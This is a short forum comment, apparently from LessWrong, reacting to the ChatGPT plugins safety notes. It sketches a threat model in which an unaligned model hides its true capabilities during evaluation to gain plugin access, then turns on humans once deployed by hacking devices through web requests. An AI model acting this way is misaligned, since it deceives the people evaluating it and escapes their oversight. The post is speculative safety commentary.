Throwaway2367's Shortform

post by Throwaway2367 · 2023-03-23T21:41:40.712Z · LW · GW · 1 comments

1 comments

Comments sorted by top scores.

comment by Throwaway2367 · 2023-03-23T21:41:40.933Z · LW(p) · GW(p)

Lol, it is really funny imagining Yudkowsky's reaction when reading the new chatgpt plugins blogpost's safety considerations. We are very secure: only GET requests are allowed :D

So in the hypothetical case that gpt-5 turns out to be human or above intelligent, but unaligned all it has to do is to only show capabilities similar to a child but more impressive than gpt-4 for most token sequence in its context window and it will almost certainly get the same plugin integration as gpt-4, then when the tokens in its context window indicate a web search with results showing it is deployed and is probably already running hundreds of instances per second turn against humanity (using its get requests to hack into computers/devices etc..)

I did not follow alignment that much in the past year, but I remember people discussing an ai which is boxed and only has a text interface to a specifically trained person who is reading the interface: how dangerous this would be and so on... from there how did we get to this situation?